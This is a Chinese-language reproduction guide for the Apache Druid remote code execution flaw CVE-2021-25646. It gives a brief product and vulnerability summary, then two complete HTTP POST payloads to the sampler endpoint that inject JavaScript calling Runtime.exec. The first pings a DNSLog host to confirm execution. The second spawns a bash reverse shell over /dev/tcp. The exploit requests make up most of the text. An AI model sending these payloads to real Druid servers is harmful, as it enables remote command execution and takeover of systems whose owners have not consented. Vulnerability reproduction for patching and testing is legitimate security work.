druid 远程命令执行(CVE-2021-25646)

druid 远程命令执行

druid 介绍

Druid是一个专为大型数据集上的高性能切片和OLAP分析而设计的数据存储。Druid最常用作为GUI分析应用程序提供动力的数据存储，或者用作需要快速聚合的高度并发API的后端

影响版本

Apache Druid < 0.20.1

漏洞简介

Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中，默认已被禁用。但是，在Druid 0.20.0及更低版本中，经过身份验证的用户发送恶意请求，利用Apache Druid漏洞可以执行任意代码。

漏洞复现

1. DNSLog

   POST /druid/indexer/v1/sampler HTTP/1.1
   Host: ip:port
   User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
   Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/json Content-Length: 679 Connection: close{"type": "index","spec": {"type": "index","ioConfig": {"type": "index","firehose": {"type": "local","baseDir": "quickstart/tutorial/","filter": "wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema": {"dataSource": "sample","parser": {"type": "string","parseSpec": {"format": "json","timestampSpec": {"column": "time","format": "iso"},"dimensionsSpec": {}}},"transformSpec": {"transforms": [],"filter": {"type": "javascript","function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping 2mp3kb.dnslog.cn')}","dimension": "added","": {"enabled": "true"}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000,"cacheKey": "4ddb48fdbad7406084e37a1b80100214"} }

2. 反弹shell

   POST /druid/indexer/v1/sampler HTTP/1.1
   Host: ip:port
   User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
   Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/json Content-Length: 679 Connection: close{"type": "index","spec": {"type": "index","ioConfig": {"type": "index","firehose": {"type": "local","baseDir": "quickstart/tutorial/","filter": "wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema": {"dataSource": "sample","parser": {"type": "string","parseSpec": {"format": "json","timestampSpec": {"column": "time","format": "iso"},"dimensionsSpec": {}}},"transformSpec": {"transforms": [],"filter": {"type": "javascript","function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/ip/port 0>&1')}","dimension": "added","": {"enabled": "true"}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000,"cacheKey": "4ddb48fdbad7406084e37a1b80100214"} } 

   

返回的状态码为200则为成功。

该漏洞是在认证完之后才可以复现的！！！